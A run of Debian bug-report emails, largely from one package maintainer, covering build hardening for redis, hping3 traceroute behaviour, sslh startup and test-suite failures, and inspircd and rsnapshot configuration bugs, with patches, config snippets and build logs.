Source: redis Version: 2.8.13 Severity: normal Tags: patch Hi, Please find attached a proposal that use dpkg-buildflags (and hardening flags) and enable multiple make jobs in your package. Please note that *FLAGS are defined and exported manually in debian/rules since the package use debhelper 7 (these 4 lines can be removed if debhelper 9 used). -- System Information: Debian Release: jessie/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.2.0-67-generic (SMP w/4 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/dash diff -Nru redis-2.8.13/debian/changelog redis-2.8.13/debian/changelog --- redis-2.8.13/debian/changelog 2014-08-05 18:16:56.0 +0200 +++ redis-2.8.13/debian/changelog 2014-09-05 14:31:00.0 +0200 @@ -1,3 +1,12 @@ +redis (2:2.8.13-3.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags CFLAGS, CPPFLAGS (patch upstream Makefile) and +LDFLAGS, also use pie and relro via DEB_BUILD_MAINT_OPTIONS + * Call make V=1 to show gcc command lines (blhc) and enable parallel build + + -- Guillaume Delacour g...@iroqwa.org Fri, 05 Sep 2014 09:49:19 +0200 + redis (2:2.8.13-3) unstable; urgency=low * Correct permissions of our /var directories by chowning them recursively. diff -Nru redis-2.8.13/debian/patches/04-dpkg-buildflags.diff redis-2.8.13/debian/patches/04-dpkg-buildflags.diff --- redis-2.8.13/debian/patches/04-dpkg-buildflags.diff 1970-01-01 01:00:00.0 +0100 +++ redis-2.8.13/debian/patches/04-dpkg-buildflags.diff 2014-09-05 12:16:02.0 +0200 @@ -0,0 +1,43 @@ +Author: Guillaume Delacour g...@iroqwa.org +Subject: Add CPPFLAGS in upstream makefiles +Last-Update: 2014-09-05 + +Index: redis-2.8.13/src/Makefile +=== +--- redis-2.8.13.orig/src/Makefile redis-2.8.13/src/Makefile +@@ -87,7 +87,7 @@ ifeq ($(MALLOC),jemalloc) + FINAL_LIBS+= -ljemalloc + endif + +-REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS) ++REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS) $(CPPFLAGS) + REDIS_LD=$(QUIET_LINK)$(CC) $(FINAL_LDFLAGS) + REDIS_INSTALL=$(QUIET_INSTALL)$(INSTALL) + +Index: redis-2.8.13/deps/linenoise/Makefile +=== +--- redis-2.8.13.orig/deps/linenoise/Makefile redis-2.8.13/deps/linenoise/Makefile +@@ -6,7 +6,7 @@ R_CFLAGS= $(STD) $(WARN) $(OPT) $(DEBUG) + R_LDFLAGS= $(LDFLAGS) + DEBUG= -g + +-R_CC=$(CC) $(R_CFLAGS) ++R_CC=$(CC) $(R_CFLAGS) $(CPPFLAGS) + R_LD=$(CC) $(R_LDFLAGS) + + linenoise.o: linenoise.h linenoise.c +Index: redis-2.8.13/deps/hiredis/Makefile +=== +--- redis-2.8.13.orig/deps/hiredis/Makefile redis-2.8.13/deps/hiredis/Makefile +@@ -28,7 +28,7 @@ CC:=$(shell sh -c 'type $(CC) /dev/null + OPTIMIZATION?=-O3 + WARNINGS=-Wall -W -Wstrict-prototypes -Wwrite-strings + DEBUG?= -g -ggdb +-REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH) ++REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH) $(CPPFLAGS) + REAL_LDFLAGS=$(LDFLAGS) $(ARCH) + + DYLIBSUFFIX=so diff -Nru redis-2.8.13/debian/patches/series redis-2.8.13/debian/patches/series --- redis-2.8.13/debian/patches/series 2014-08-05 18:16:56.0 +0200 +++ redis-2.8.13/debian/patches/series 2014-09-05 14:04:24.0 +0200 @@ -1,3 +1,4 @@ 01-fix-ftbfs-on-kfreebsd.diff -p1 02-fix-ftbfs-on-kfreebsd -p1 03-use-system-jemalloc.diff -p1 +04-dpkg-buildflags.diff -p1 diff -Nru redis-2.8.13/debian/rules redis-2.8.13/debian/rules --- redis-2.8.13/debian/rules 2014-08-05 18:16:56.0 +0200 +++ redis-2.8.13/debian/rules 2014-09-05 14:18:15.0 +0200 @@ -1,6 +1,17 @@ #!/usr/bin/make -f -unexport CFLAGS +export DEB_BUILD_MAINT_OPTIONS = hardening=+all + +CPPFLAGS:=$(shell dpkg-buildflags --get CPPFLAGS) +CFLAGS:=$(shell dpkg-buildflags --get CFLAGS) +LDFLAGS:=$(shell dpkg-buildflags --get LDFLAGS) +export CPPFLAGS CFLAGS LDFLAGS + +ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) + MAKEFLAGS += -j$(NUMJOBS) + export MAKEFLAGS +endif ifneq (,$(filter $(shell dpkg-architecture -qDEB_HOST_ARCH),armel hurd-i386 kfreebsd-amd64 kfreebsd-i386 s390 sparc)) export FORCE_LIBC_MALLOC = yes @@ -14,6 +25,9 @@ override_dh_auto_install: +override_dh_auto_build: + dh_auto_build --parallel -- V=1 + clean: dh $@ rm -f src/release.h
Bug#711075: hping3: Option '-z'/increasing TTL for traceroute mode doesn't work
Le mardi 04 juin 2013 à 14:55 +0200, christian mock a écrit : Package: hping3 Version: 3.a2.ds2-6 Severity: normal Dear Maintainer, First, sorry for the late. In the current version of hping3, there seems to be no way to use Ctrl-Z to increase the TTL in the traceroute mode (-T). Neither with nor without the -z option does this work. In earlier versions, hping3 intercepted Ctrl-Z, now it just backgrounds due to shell job control. Please note that the version 3.a2.ds2-6 was unchanged between Debian 6 and 7. Anyway, i don't reproduce this; every time i press Ctrl-z, the ttl is increased (Gnome terminal 3.4.1.1). If i use --unbind, the Ctrl-z is ignored by hping3, so the process goes in background. Can you re-test the feature and maybe with another environnement ? -- System Information: Debian Release: 7.0 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=de_AT.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages hping3 depends on: ii libc6 2.13-38 ii libpcap0.8 1.3.0-1 ii tcl8.4 8.4.19-5 hping3 recommends no packages. hping3 suggests no packages. -- no debconf information -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#688458: Conflicting types for variable ip_optlen
Le samedi 22 septembre 2012 à 22:07 +0100, Michael Tautschnig a écrit : Package: hping3 Version: 3.a2.ds2-6 While compiling the package using our research compiler infrastructure we noticed the following conflicting declaration of the variable ip_optlen: - globals.h: extern char ip_optlen; - main.c: unsigned ip_optlen; This will cause undefined behaviour if the value of ip_optlen exceeds 127 for any architecture with signed char type. This is also problematic in other cases where ip_optlen stores the return value of functions returning unsigned char. Good catch. I understand the possible collision, but i don't measure well the real impact in the source code. Hping3 author is not active anymore on this project and i can only maintain the packaging or minor modifications, so unless there is a blocker issue, i'll not investigate the problem further (but another patch for hping3 could be integrated in Debian if someone want to take the time). Thanks. Best, Michael -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#735922: wishlist: document logging in /var/log/auth.log
Le samedi 18 janvier 2014 à 17:28 +0100, Geert Stappers a écrit : Package: sslh Version: 1.13b-3.2 Severity: minor Dear Maintainer, When I have logged in through sslh, my connection is from localhost. I do understand this artifact of sslh. I did took me some time to find out from where the connection came from. It would be nice if the manual page says that logging is done in /var/log/auth.log Yes you're right, sslh use LOG_AUTH facility (in common.c:488) which is on Debian systems logged in /var/log/auth.log (in /etc/rsyslog.conf:61). I'll propose upstream to add a syslog paragraph in the manpage to document this. Thank you for maintaining sslh in Debian. Cheers Geert Stappers -- System Information: Debian Release: 7.0 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.2.0-4-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/dash Versions of packages sslh depends on: ii adduser 3.113+nmu3 ii debconf 1.5.49 ii libc6 2.13-38 ii libconfig91.4.8-5 ii lsb-base 4.1+Debian8 ii update-inetd 4.43 Versions of packages sslh recommends: ii apache2 2.2.22-13 ii apache2-mpm-prefork [httpd] 2.2.22-13 ii openssh-server [ssh-server] 1:6.0p1-4 Versions of packages sslh suggests: pn openbsd-inetd | inet-superserver none -- Configuration Files: /etc/default/sslh changed: RUN=yes DAEMON=/usr/sbin/sslh DAEMON_OPTS=--user sslh --listen 0.0.0.0:443 --numeric --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid -- debconf information: * sslh/inetd_or_standalone: standalone -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#740560: sslh fails to start with systemd as PID=1
Le dimanche 02 mars 2014 à 22:35 +0100, Gilles Filippini a écrit : Package: sslh Version: 1.15-1 Severity: normal Hi, Hi, I've just switched to systemd as init system on my box, and after rebbot sslh wasn't running. From what I understand the cause of the failure is a missing /var/run/sslh directory. After adding the settings below to the sslh.service file, I can start it manually using invoke-rc.d but it keeps failing at boot time: ExecStartPre=/bin/mkdir -p /var/run/sslh ExecStartPre=/bin/chown -R sslh:sslh /var/run/sslh/ Instead, i can propose to use a /usr/lib/tmpfiles.d/sslh.conf file like this: d /run/sslh 0755 sslh sslh - I'll test this soon, but maybe you'll test this before me. Please let me know about any missing information in this report. Thanks, _g. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386
Le vendredi 27 avril 2012 à 09:32 +0100, Jonathan Wiltshire a écrit : Hi! On 2012-04-26 19:33, Guillaume Delacour wrote: Le mercredi 18 avril 2012 à 00:01 +0100, Jonathan Wiltshire a écrit : E: inspircd: depends-on-essential-package-without-using-version depends: hurd As inspircd use libpthread, it seems to be a bug and will be fixed with the next upload of eglibc that include libpthread (as #debian-hurd folks). Ok. In that case please clone+retitle+reassign this bug to hurd and set appropriate Blocks so that it is documented somewhere. I'm sorry, i didn't manage to find the origin of this bug, closing it now. Thanks -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#668253: inspircd: does not close stdin or stderr on startup, consumes 100% cpu
Le mercredi 13 juin 2012 à 20:24 +0930, Michael a écrit : Hello, This bug is marked as fixed-upstream, however the bug has not been fixed in Debian stable. For me, the 100% CPU issue occurs with inspircd 1.1.22+dfsg-4+squeeze1, but not inspircd 1.1.22+dfsg-4, on two different systems. To me this indicates a bug in the security update. Can this fix please be backported into stable? It makes the software unusable otherwise, and I have to hold off on applying the security update or upgrade to testing. Instead of backporting the fix, the new version 2.0.5 (which fix many issues) has been backported the 29 Mar 2013 into stable (which is Squeeze oldstable today). Sorry for the late answer. Thanks, Michael -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#724874: [PKG-IRC-Maintainers] Bug#724874: inspircd: 2.0.15 now available
Hi, Le lundi 16 juin 2014 à 14:45 +, Jeremy Stanley a écrit : On 2014-06-16 15:29:20 +0800 (+0800), David Adam wrote: I removed my package so that Guillaume could upload his, but I think that took his 2.0.16 package away too - sorry. Guillame does have a 2.0.16 package available. It would be great to get that moving again... there are a lot of bug fixes between the 2.0.5 currently in Sid/Jessie and 2.0.16, so would be disappointing to see Jessie release with those issues. If the 2.0.16 source package is somewhere accessible or if Guillaume could put it back up on mentors.d.n, I'd be happy to review and test it (though not being a DD I can't sponsor of course). I re-uploaded it again on mentors, thanks for feedback ! -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#724874: [PKG-IRC-Maintainers] Bug#724874: Bug#724874: inspircd: 2.0.15 now available
Hi all, Le samedi 01 mars 2014 à 15:14 +0100, Christoph Biedl a écrit : Christoph Biedl wrote... Now I'd like to suggest the following procedure: Unless nobody objects by Thu March 6th, feel free to upload your inspircd packaging. I've prepared a package a few days ago by didn't finish it, there is the changelog: * New upstream release (Closes: #724874), enable m_regex_stdlib new module * Drop patches accepted upstream: + debian/patches/01_spelling_error.diff + debian/patches/03_CVE-2012-1836.diff (cherry-picked) + debian/patches/04_FTBFS_kfreebsd.diff + debian/patches/05_FTBFS_gcc-4.7.diff * debian/docs: docs/README has moved to README.md * debian/examples: examples are now in docs/conf * Bump debhelper compat to 9 * Remove Bradley Smith as uploaders (Closes: #674890) * debian/watch: update based on sepwatch * Add systemd support: + Build-Depends on dh-systemd (= 1.5) + Add debian/inspircd.service, debian/inspircd.tmpfiles.d.conf + debian/rules: call generic dh with --with systemd * debian/control: Change Vcs-{Svn,Browser}, point to anonscm.debian.org and bump to Standards-Version 3.9.5 (no changes needed) * debian/patches/02_disable_rpath_for_extra_modules.diff: Refresh according upstream modules changes -- Guillaume Delacour g...@iroqwa.org Sat, 01 Feb 2014 15:36:52 +0100 I've started to rewrite debian/copyright too, i can just finish it. I propose to integrate David's diff to my version and add it to uploaders today or within the next week. ___ Pkg-irc-maintainers mailing list pkg-irc-maintain...@lists.alioth.debian.org http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-irc-maintainers -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#717451: Backups broken when ssh_args are set
Le jeudi 25 juillet 2013 à 18:12 -0400, Michel L. a écrit : Package: rsnapshot Version: 1.3.1-4 Followup-For: Bug #717451 Dear Maintainer, Just want to confirm that rsnapshot is failing here as well. When using ssh_args, for example: ssh_args-o BatchMode=yes -p 1234 I downgraded to rsnapshot 1.3.1-3[0], to get my backups working again. [0] http://snapshot.debian.org/package/rsnapshot/1.3.1-3/#rsnapshot_1.3.1-3 You're both right, the ssh args are broken since i've applied the patch 10_space_destdir.diff [0]. The last upstream version is also impacted by this changes [1]. The solution proposed is the same as the first reporter of this bug and upstream is now thinking about a way to properly handle rsync --rsh= arguments. As rsnapshot remote backup with ssh is now broken, i'll include the proposed workaround as a countermeasure (at least temporarily). [0]: http://rsnapshot.cvs.sourceforge.net/viewvc/rsnapshot/rsnapshot/rsnapshot-program.pl?revision=1.414view=markup [1]: https://github.com/DrHyde/rsnapshot/pull/1 -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#717940: Incorrect description of rsync_numtries in rsnapshot.conf
Le samedi 27 juillet 2013 à 00:59 +0200, Jonathan Leroy a écrit : Package: rsnapshot Version: 1.3.1-1 Severity: minor Tags: upstream Hi, Hi, The description of rsync_numtries setting in rsnapshot.conf seems to be incorrect: # Number of rsync re-tries. If you experience any network problems or # network card issues that tend to cause ssh to crap-out with # Corrupted MAC on input errors, for example, set this to a non-zero # value to have the rsync operation re-tried # #rsync_numtries 0 The configuration says set this to a non-zero value, what do you suggest to be more precise ? (i never use this option, but think it' quite clear like this). I agree that the default commented value should be 1 instead of 0. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#710283: inspircd: Starting Inspircd fails on writing to PID file
Le mercredi 29 mai 2013 à 16:45 +0200, Tim Gouma a écrit : Package: inspircd Version: 2.0.5-1+b1 Severity: grave Tags: upstream Justification: renders package unusable Hi, After configuration Inspircd always fails to start with the following error in /var/log/inspircd.log Wed May 29 16:33:24 2013: Failed to write PID-file 'data/inspircd.pid', exiting. But in the config file the pid file location is configured as /var/run/inspircd.pid -- System Information: Debian Release: 7.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (x86_64) Kernel: Linux 3.2.0-4-amd64 (SMP w/1 CPU core) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/dash Versions of packages inspircd depends on: ii libc6 2.13-38 ii libgcc1 1:4.7.2-5 ii libgeoip1 1.4.8+dfsg-3 ii libgnutls26 2.12.20-6 ii libldap-2.4-2 2.4.31-1+nmu2 ii libmysqlclient18 5.5.31+dfsg-0+wheezy1 ii libpcre3 1:8.30-5 ii libpq59.2.4-1.pgdg70+1 ii libsqlite3-0 3.7.13-1+deb7u1 ii libstdc++64.7.2-5 ii libtre5 0.8.0-3 ii lsb-base 4.1+Debian8 ii zlib1g1:1.2.7.dfsg-13 inspircd recommends no packages. Versions of packages inspircd suggests: pn gnutls-binnone pn ldap-server none pn mysql-server none pn postgresqlnone pn sqlite3 none -- Configuration Files: /etc/default/inspircd changed: INSPIRCD_ENABLED=1 /etc/inspircd/inspircd.conf changed: pid file=/var/run/inspircd.pid / Problem with /^ You've edited your configuration and add a slash before , this is why inspircd fails to start (reproduced with wheezy chroot). The correct (package default) directive might be : pid file=/var/run/inspircd.pid - Cut Irrelevant Parts of Config file - -- no debconf information -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#678333: fails to terminate it's own testcode
On Wed, Jun 20, 2012 at 11:48:32PM +0200, Andreas Barth wrote: Package: sslh Version: 1.13b-2 Severity: serious Hi, Hi, this packages fails to terminate it's testcode properly (at least on mipsel) and therefore requires the buildd to timeout the build (and wastes endless time): buildd 18416 1 0 21:27 ?00:00:00 sh -c ./echosrv --listen ip6-localhost:9000 --prefix 'ssh: ' buildd 18417 1 0 21:27 ?00:00:00 sh -c ./echosrv --listen ip6-localhost:9001 --prefix 'ssl: ' buildd 18419 18416 0 21:27 ?00:00:00 ./echosrv --listen ip6-localhost 9000 --prefix ssh: buildd 18420 18417 0 21:27 ?00:00:00 ./echosrv --listen ip6-localhost 9001 --prefix ssl: buildd 18421 18419 0 21:27 ?00:00:00 ./echosrv --listen ip6-localhost 9000 --prefix ssh: buildd 18422 18420 0 21:27 ?00:00:00 ./echosrv --listen ip6-localhost 9001 --prefix ssl: Please make sure whatever happens that the testcode is terminated. You're absolutely right; i didn't see that *ALL* buildd are waited the process to be terminated (Build killed with signal TERM after 150 minutes of inactivity) Upstream call killall echosrv in the testcode, but the package (psmisc) is not essential, so not installed on buildd. I've reproduced the problem with pbuilder and i'll just add a Build-Depends on psmisc in 1.13b-3. Andi -- Guillaume Delacour signature.asc Description: Digital signature
Bug#660385: php5-imagick: ignores memory limit
Hello, The resource type RESOURCETYPE_MEMORY on php-imagick corresponds to ImageMagick MAGICK_MEMORY_LIMIT, which define how much memory could be use to reserve memory for tasks and when the limit is reached, cached memory-mapped disk is used: http://fr2.php.net/manual/en/imagick.setresourcelimit.php http://www.imagemagick.org/script/resources.php#environment So whatever value you use in setResourceLimit for RESOURCETYPE_MEMORY, the tasks are processed (less or more quickly). -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#650406: sslh: does not start automatically during Debian init process
Hello, Le mercredi 25 janvier 2012 à 00:07 +0100, Philippe Basinska a écrit : Le 22/01/2012 21:26, Guillaume Delacour a écrit : Hello, Le samedi 17 décembre 2011 à 21:34 +0100, Guillaume Delacour a écrit : Le mardi 29 novembre 2011 à 16:51 +0100, Philippe Basinska a écrit : Package: sslh Version: 1.6i-4 Severity: normal Tags: patch Hello, I didn't tag the issue with 'squeeze' label since I can't test it right now on a testing system. However, init script of sslh seems different in version 1.9. Whatever, my stable sslh daemon does not start automatically with Debian Squeeze. The command `invoke-rc.d sslh start` is good enough to fix the issue until next reboot. Any news on this issue ? Is my explanation correct ? Hi Guillaume, I just rolled back my hack to try your solution. I mean that I removed the LSB tag to start sshd before sslh and I updated the SysV init links. Then I added the option to log stuff in /var/log/boot. Now, sslh starts during each boot. Even if I didn't change anything in my network interface. I tried a few times to be sure but it works fine and I got no relevant information in log (indeed, the sslh daemon starts...). Starting ssl/ssh multiplexer : sslh SSL addr: 127.0.0.1:443 (after timeout 2s) SSH addr: 127.0.0.1:22 listening on 192.168.2.1:443 turning into sslh I assume the problem disappeared because I changed rc2.d links. Actually, both ssh and sslh start much later so the network must be available. server-bl:~# ls -l /etc/rc2.d/ | grep ssh\|sslh lrwxrwxrwx 1 root root 13 25 janv. 00:03 S22ssh - ../init.d/ssh lrwxrwxrwx 1 root root 14 24 janv. 23:58 S24sslh - ../init.d/sslh See you, So i close this bugreport, feel free to reopen if you have other issues about this. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386
Hi, Le mercredi 18 avril 2012 à 00:01 +0100, Jonathan Wiltshire a écrit : Source: inspircd Version: 2.0.5-1 Severity: important This is a lintian error: E: inspircd: depends-on-essential-package-without-using-version depends: hurd As inspircd use libpthread, it seems to be a bug and will be fixed with the next upload of eglibc that include libpthread (as #debian-hurd folks). -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 3.2.0-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.utf8, LC_CTYPE=en_GB.utf8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#660372: fix cmd_postexec - allow unmounting of snapshot root by cmd_postexec config option
tags 660372 moreinfo thanks Hi, Le samedi 18 février 2012 à 18:53 +0100, Mike Gabriel a écrit : Package: rsnapshot Version: 1.3.1-1 Severity: normal Tags: squeeze With rsnapshot from lenny it was able to copy backups to a mounted USB hard disk and unmount the USB disk after rsnapshot had finished. For the unmounting I used the cmd_postexec configuration parameter. With rsnapshot from squeeze this is not possible anymore. rsnapshot complains with ,,Device or resource busy'' (meaning: the USB disk cannot be unmounted because rsnapshot has its current working directory within the snapshot root somewhere). With this issue report I would like to provide a patch (against rsnapshot in squeeze) that might solve the problem. (,,might'' means here: the problem occurrs at a customer's site where I cannot test the patch ATM, but it is very likely that the patch fixes the reported issue). I'm not sure the problem are cmd_{pre,post}exec commands, the following tests work well in a squeeze chroot test environment (i only use rsnapshot to backup to local storage): fake usb device disk with ext3 fs mounted on loopback $ dd if=/dev/zero of=/tmp/usb_fake_disk bs=1M count=128 $ sudo mkfs -t ext3 /tmp/usb_fake_disk $ sudo mount -o loop /tmp/usb_fake_disk /mnt/ ls /mnt \ sudo umount /mnt/ minimal rsnapshot.conf $ egrep -v '^($|#)' /etc/rsnapshot.conf config_version 1.2 snapshot_root /mnt/ cmd_rm /bin/rm cmd_rsync /usr/bin/rsync cmd_logger /usr/bin/logger cmd_preexec /bin/mount -o loop /tmp/usb_fake_disk /mnt/ cmd_postexec/bin/umount /mnt/ intervalhourly 6 intervaldaily 7 intervalweekly 4 verbose 2 loglevel3 lockfile/var/run/rsnapshot.pid backup /etc/ localhost/ launch a job to validate $ sudo rsnapshot -v hourly echo 19163 /var/run/rsnapshot.pid /bin/mount -o loop /tmp/usb_fake_disk /mnt/ mkdir -m 0755 -p /mnt/hourly.0/ /usr/bin/rsync -a --delete --numeric-ids --relative --delete-excluded /etc \ /mnt/hourly.0/localhost/ touch /mnt/hourly.0/ /bin/umount /mnt/ rm -f /var/run/rsnapshot.pid $ sudo mount -o loop /tmp/usb_fake_disk /mnt/ \ ls /mnt/hourly.0/localhost/ etc Can you check the issue by running the rsnapshot cron jobs with the -v flag and redirect stderr to a logfile to verify that the problem is not the usb disk itself (to long to umount, etc.) or its usage (use lsof or fuser to verify that no other task use the mountpoint, etc.) ? It would be great to have information about this issue, to definitively eliminate or not cmd_{pre,post}exec behavior (and maybe great to validate your patch too). Thanks. The patch will be send with a follow-up mail. -- System Information: Debian Release: 6.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-5-amd64 (SMP w/4 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages rsnapshot depends on: ii liblchown-perl 1.01-1Perl interface to the lchown() sys ii logrotate 3.7.8-6 Log rotation utility ii perl 5.10.1-17squeeze3 Larry Wall's Practical Extraction ii rsync 3.0.7-2 fast remote file copy program (lik Versions of packages rsnapshot recommends: ii openssh-client1:5.5p1-6+squeeze1 secure shell (SSH) client, for sec rsnapshot suggests no packages. -- no debconf information -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#665260: sslh: FTBFS: Can't exec lcov: No such file or directory at ./t line 298.
listening on: localhost:9002 localhost:9002 timeout to ssh: 2 listening to 2 addresses localhost:9002:bind: Address already in use exited with 1 # Failed test 'Exit status if can't open PID file' # at ./t line 265. # got: '1' # expected: '3' not ok 25 - Exit status if can't open PID file I think this is the same problem here. ***Test: Can't bind address spawned 19256 ssh addr: localhost:9000. libwrap service: sshd family 10 10 ssl addr: localhost:9001. libwrap service: (null) family 10 10 listening on: fx-in-f106.1e100.net:9000 timeout to ssh: 2 listening to 1 addresses fx-in-f106.1e100.net:9000:bind: Cannot assign requested address exited with 1 ok 26 - Exit status if can't bind address ***Test: Can't resolve address spawned 19257 Name or service not known `blahblah.dontexist' exited with 4 ok 27 - Exit status if can't resolve address Can't exec lcov: No such file or directory at ./t line 298. Can't exec genhtml: No such file or directory at ./t line 299. Can't exec killall: No such file or directory at ./t line 301. # Looks like you failed 2 tests of 27. The problem is just here; the upstream test suite fails on 2 tests, see above. 1..27 make[1]: *** [test] Error 2 The full build log is available from: http://people.debian.org/~lucas/logs/2012/03/21/sslh_1.10-3.log A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. [1]: http://bugs.debian.org/660269 -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
Le mardi 20 mars 2012 à 21:58 +0100, Guillaume Delacour a écrit : Le mercredi 07 mars 2012 à 02:33 +0100, Guillaume Delacour a écrit : I'm afraid, there is another problem with fano and field schroots: 127.0.0.1 appears to point twice to localhost, so sslh try to listen twice to localhost (--listen 127.0.0.1:$sslh_port in t test file). I've ping christoph on irc to know if it is possible to fix /etc/hosts on these box, otherwise i'll refresh the patch i've made to bind to 127.0.0.1 and not localhost. -- Guillaume Delacour g...@iroqwa.org The 1.10-3 version does not completely fix the problem: there is yet others issue with localhost entries in /etc/hosts on buildd: ***Test: Changing to non-existant username spawned 21450 ssh addr: localhost:9000. libwrap service: sshd family 28 28 ssl addr: localhost:9001. libwrap service: (null) family 28 28 listening on: localhost:9002 localhost:9002 timeout to ssh: 2 listening to 2 addresses localhost:9002:bind: Address already in use exited with 1 not ok 24 - Exit status on non-existant username # Failed test 'Exit status on non-existant username' # at ./t line 249. # got: '1' # expected: '2' ***Test: Can't open PID file spawned 21451 ssh addr: localhost:9000. libwrap service: sshd family 28 28 ssl addr: localhost:9001. libwrap service: (null) family 28 28 listening on: localhost:9002 localhost:9002 timeout to ssh: 2 listening to 2 addresses localhost:9002:bind: Address already in use exited with 1 not ok 25 - Exit status if can't open PID file # Failed test 'Exit status if can't open PID file' # at ./t line 265. # got: '1' # expected: '3' ***Test: Can't bind address I've contacted a kfreebsd build admin who should make some changes in /etc/hosts in schroot to fix all these issues. Thanks to christoph, sslh now build kfreebsd-*. I can really close this bug. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
Le mercredi 07 mars 2012 à 02:33 +0100, Guillaume Delacour a écrit : I'm afraid, there is another problem with fano and field schroots: 127.0.0.1 appears to point twice to localhost, so sslh try to listen twice to localhost (--listen 127.0.0.1:$sslh_port in t test file). I've ping christoph on irc to know if it is possible to fix /etc/hosts on these box, otherwise i'll refresh the patch i've made to bind to 127.0.0.1 and not localhost. -- Guillaume Delacour g...@iroqwa.org The 1.10-3 version does not completely fix the problem: there is yet others issue with localhost entries in /etc/hosts on buildd: ***Test: Changing to non-existant username spawned 21450 ssh addr: localhost:9000. libwrap service: sshd family 28 28 ssl addr: localhost:9001. libwrap service: (null) family 28 28 listening on: localhost:9002 localhost:9002 timeout to ssh: 2 listening to 2 addresses localhost:9002:bind: Address already in use exited with 1 not ok 24 - Exit status on non-existant username # Failed test 'Exit status on non-existant username' # at ./t line 249. # got: '1' # expected: '2' ***Test: Can't open PID file spawned 21451 ssh addr: localhost:9000. libwrap service: sshd family 28 28 ssl addr: localhost:9001. libwrap service: (null) family 28 28 listening on: localhost:9002 localhost:9002 timeout to ssh: 2 listening to 2 addresses localhost:9002:bind: Address already in use exited with 1 not ok 25 - Exit status if can't open PID file # Failed test 'Exit status if can't open PID file' # at ./t line 265. # got: '1' # expected: '3' ***Test: Can't bind address I've contacted a kfreebsd build admin who should make some changes in /etc/hosts in schroot to fix all these issues. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
